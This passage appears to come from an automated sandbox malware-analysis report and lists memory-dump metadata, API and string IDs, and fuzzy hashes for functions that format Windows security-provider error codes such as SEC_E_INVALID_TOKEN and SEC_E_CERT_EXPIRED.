                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_INVALID_PARAMETER
                            • API String ID: 1435330505-1537070967
                            • Opcode ID: 940f7868e7b2f42909865a993612ef6140e3dac1efdbf0aaf0a83290997d1c76
                            • Instruction ID: be724cd658a60b382ff3539613bdc3c909b40ef354caedd06eb5828b8b174f83
                            • Opcode Fuzzy Hash: 940f7868e7b2f42909865a993612ef6140e3dac1efdbf0aaf0a83290997d1c76
                            • Instruction Fuzzy Hash: 00118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_INVALID_HANDLE
                            • API String ID: 1435330505-4021695947
                            • Opcode ID: 1ccc7f8e97859bc73aa3f76700d79d4a1207450ed5b12cbe54713aae9eb2eb59
                            • Instruction ID: 83ff8d5d28a98672033ca08ddf628a98d836f3f38d0deb31716bd615450039a7
                            • Opcode Fuzzy Hash: 1ccc7f8e97859bc73aa3f76700d79d4a1207450ed5b12cbe54713aae9eb2eb59
                            • Instruction Fuzzy Hash: BA118F22618A4285E7A9FF10A0442FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_INVALID_TOKEN
                            • API String ID: 1435330505-3630042646
                            • Opcode ID: 686989267c888d7f23e32433200b644c839d46ceebeaf6b6b217fa87361fa506
                            • Instruction ID: e1e6d627ef57ff3dc17850543352309b94185fa17dc5e50dc38d84f67ebc371f
                            • Opcode Fuzzy Hash: 686989267c888d7f23e32433200b644c839d46ceebeaf6b6b217fa87361fa506
                            • Instruction Fuzzy Hash: E1118F22618A4295E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_INSUFFICIENT_MEMORY
                            • API String ID: 1435330505-672193982
                            • Opcode ID: 67e681bb56680d3b8d4935495d36cd04192940dde4f6866a3a85344a5c4baf2d
                            • Instruction ID: ebea9e27d96a823354836dd87aa83ca1506fe91e34c89f70188844b9d239d55f
                            • Opcode Fuzzy Hash: 67e681bb56680d3b8d4935495d36cd04192940dde4f6866a3a85344a5c4baf2d
                            • Instruction Fuzzy Hash: 5B118F26618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_INTERNAL_ERROR
                            • API String ID: 1435330505-2974677361
                            • Opcode ID: b73027b0e82c3415a1cc19ac55154d864395068921df4522c0e00a430fab6bcd
                            • Instruction ID: c095bd11ce94a0637f9efbd4cfdf412d822f495523b9bc546784e1915f97a4a3
                            • Opcode Fuzzy Hash: b73027b0e82c3415a1cc19ac55154d864395068921df4522c0e00a430fab6bcd
                            • Instruction Fuzzy Hash: 95118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_ENCRYPT_FAILURE
                            • API String ID: 1435330505-3602081711
                            • Opcode ID: a069910b7e16112447585ca2bf66f6aef3820300fc95228b938ef203b0afdc6f
                            • Instruction ID: 463cdf02c9cedf887dfe9551a2ce317f44b6df2f17f4d7b6fc6c8f52e609f02c
                            • Opcode Fuzzy Hash: a069910b7e16112447585ca2bf66f6aef3820300fc95228b938ef203b0afdc6f
                            • Instruction Fuzzy Hash: 48118F22618A4285E7A8FF10A0402FDA375FF88781FC54036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_INCOMPLETE_MESSAGE
                            • API String ID: 1435330505-695297855
                            • Opcode ID: f6d8f430167f9a678a48b3762f0f39f8e2b67f43924b143f0b68908b999fc137
                            • Instruction ID: 0f73a0de9ceec2c6590086e35eb789bc4145af4b72a9966aa2f43802ceec06a2
                            • Opcode Fuzzy Hash: f6d8f430167f9a678a48b3762f0f39f8e2b67f43924b143f0b68908b999fc137
                            • Instruction Fuzzy Hash: 94118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_INCOMPLETE_CREDENTIALS
                            • API String ID: 1435330505-965260069
                            • Opcode ID: 093c31c1eed8a8e606177ce2d0f43c12cfdabb9527c4b5f6908968dc43e67d88
                            • Instruction ID: 07e48cfb1e86192f95d3bbdbaca541e4a3d93b1e52efdaea0f3c612988470cfe
                            • Opcode Fuzzy Hash: 093c31c1eed8a8e606177ce2d0f43c12cfdabb9527c4b5f6908968dc43e67d88
                            • Instruction Fuzzy Hash: A7118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCE845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_DELEGATION_REQUIRED
                            • API String ID: 1435330505-1475363564
                            • Opcode ID: 130e6a446de66eca2d589899456355e79c5de7575e6b52e0601625ad88b0dbe6
                            • Instruction ID: aa79ef2ff4c84d6f41541e00b0bb3db94e7bd917ef9d34e0c6835d93da37838f
                            • Opcode Fuzzy Hash: 130e6a446de66eca2d589899456355e79c5de7575e6b52e0601625ad88b0dbe6
                            • Instruction Fuzzy Hash: 88118F22618A4295E7A8FF10A0402FDA375FF88781FC54036D9AE027D6DFBCD845C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_DELEGATION_POLICY
                            • API String ID: 1435330505-2634068886
                            • Opcode ID: 0cd4fa5997972d2d4ee78d9e2a8320fbf3ebcfa5655459d3103b7b82c026c99f
                            • Instruction ID: ef4091316819b38f545ee943c8b64b9ceba32713c47b84434795e9db7d4862b4
                            • Opcode Fuzzy Hash: 0cd4fa5997972d2d4ee78d9e2a8320fbf3ebcfa5655459d3103b7b82c026c99f
                            • Instruction Fuzzy Hash: 4C118F22618A4285E7A8FF10A0402FDA375FF88781FC54036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_DOWNGRADE_DETECTED
                            • API String ID: 1435330505-4035505591
                            • Opcode ID: 66253346eadda784d8989a8535fe5ad6c74660b5a38866b9ab7e8d30f3edfdd2
                            • Instruction ID: 6a25e6517519d371752211ac305104d4d4cf63ea7647f5f2dcae3d48dc0d5dc1
                            • Opcode Fuzzy Hash: 66253346eadda784d8989a8535fe5ad6c74660b5a38866b9ab7e8d30f3edfdd2
                            • Instruction Fuzzy Hash: 4E118F22A18A4285E7A8FF10A0402FDA375FF88781FC54036D9AE027D6DFBCD845C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_CRYPTO_SYSTEM_INVALID
                            • API String ID: 1435330505-4258808491
                            • Opcode ID: f0214badc81598639f5c94e96cd189ea41e69131be946ebf9d4bb4d319cf6825
                            • Instruction ID: 6c0e826ca13ee46f3c084e950569f438904b0a700790c1075d77c09e47de030f
                            • Opcode Fuzzy Hash: f0214badc81598639f5c94e96cd189ea41e69131be946ebf9d4bb4d319cf6825
                            • Instruction Fuzzy Hash: 94118F22618A4285E7A8FF10A0442FDA375FF88781FC54036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_DECRYPT_FAILURE
                            • API String ID: 1435330505-544245674
                            • Opcode ID: 339e242ecdf1bd0b96c92c6234d66f240e6d1b3337810cff0895d072dac6244c
                            • Instruction ID: 45c724be2953f04d2d674658f7e7fd87f35f25140fd90187765b9449b0c307cd
                            • Opcode Fuzzy Hash: 339e242ecdf1bd0b96c92c6234d66f240e6d1b3337810cff0895d072dac6244c
                            • Instruction Fuzzy Hash: 06118F22618A4285E7A9FF10A0442FDA375FF88781FC54036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_CERT_WRONG_USAGE
                            • API String ID: 1435330505-580453001
                            • Opcode ID: ce792466191a31168fd5d1624b547cb1894e0de980c79da1f368eb6b839474ed
                            • Instruction ID: c6fefb275f2c230a2f7725138abe4a7170925a542fad34fd35c8f42500a59e23
                            • Opcode Fuzzy Hash: ce792466191a31168fd5d1624b547cb1894e0de980c79da1f368eb6b839474ed
                            • Instruction Fuzzy Hash: BA118F22618A4285E7A8FF10A0402FDA375FF88781FC54036D9AE027D6DFBCE845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_CROSSREALM_DELEGATION_FAILURE
                            • API String ID: 1435330505-4241613852
                            • Opcode ID: 2974c576077029ee25f22865dcd853479b9b6230f44d0ea9cf22614c72c630c4
                            • Instruction ID: cfd42f9e3b62c721a897f4949c81972f690d7ddd5e8166513d17ada5d7c4d736
                            • Opcode Fuzzy Hash: 2974c576077029ee25f22865dcd853479b9b6230f44d0ea9cf22614c72c630c4
                            • Instruction Fuzzy Hash: DA118F22618A4285E7A8FF10A0402FDA375FF88781FC54036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_CONTEXT_EXPIRED
                            • API String ID: 1435330505-1320710087
                            • Opcode ID: 941d832c0fe127b416e632ba0a2c791afdffc495b08fff7e7ce875314c989ed4
                            • Instruction ID: 43a6a89c86375fe79f837ea2914249ec901657c311fb455f89804d36182749db
                            • Opcode Fuzzy Hash: 941d832c0fe127b416e632ba0a2c791afdffc495b08fff7e7ce875314c989ed4
                            • Instruction Fuzzy Hash: D5118F22618A4285E7A8FF10A0402FDA375FF88781FC54036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_CERT_EXPIRED
                            • API String ID: 1435330505-3862749013
                            • Opcode ID: 88de8354579e04ee29edc09b03b878f79f5a612902c9ab28cd79dd6bfbce5d0b
                            • Instruction ID: 28364270f6df6d4cd318e021866ef3502e4fe2c2be639003c2ab90121210b1c1
                            • Opcode Fuzzy Hash: 88de8354579e04ee29edc09b03b878f79f5a612902c9ab28cd79dd6bfbce5d0b
                            • Instruction Fuzzy Hash: 10116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_CANNOT_PACK
                            • API String ID: 1435330505-1502336670
                            • Opcode ID: 3d75235f3c568a5d41d28b0cdd34350df6baf9ae75e8372f00a15255d58dccb4
                            • Instruction ID: dc1eb6c301bef3b667ccd231692fd0e39f34382aeac07dbd2a1cdc169f398acb
                            • Opcode Fuzzy Hash: 3d75235f3c568a5d41d28b0cdd34350df6baf9ae75e8372f00a15255d58dccb4
                            • Instruction Fuzzy Hash: 68116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_CERT_UNKNOWN
                            • API String ID: 1435330505-1381340633
                            • Opcode ID: daf07e83d593dc362a7ab3eb46dc30fcd452bd0328cd0cc7b538d4fa76b2a8e0
                            • Instruction ID: c716f57a7c4233965e4610e95645a3002b4b34b8a679e1673b2782d2f7277072
                            • Opcode Fuzzy Hash: daf07e83d593dc362a7ab3eb46dc30fcd452bd0328cd0cc7b538d4fa76b2a8e0
                            • Instruction Fuzzy Hash: EE116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
                            • String ID: %s (0x%08X)$%s - %s$SEC_E_BUFFER_TOO_SMALL
                            • API String ID: 1435330505-1965992168
                            • Opcode ID: 6a42a592e6e0b22ff36b40e127086da92e25e084003e4c2e606844b3088ec4d5
                            • Instruction ID: 9fea92083878fd615bcac31426c8b2cf6d1a63eafdc373b206af8c6c1243b1ce
                            • Opcode Fuzzy Hash: 6a42a592e6e0b22ff36b40e127086da92e25e084003e4c2e606844b3088ec4d5
                            • Instruction Fuzzy Hash: DC118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
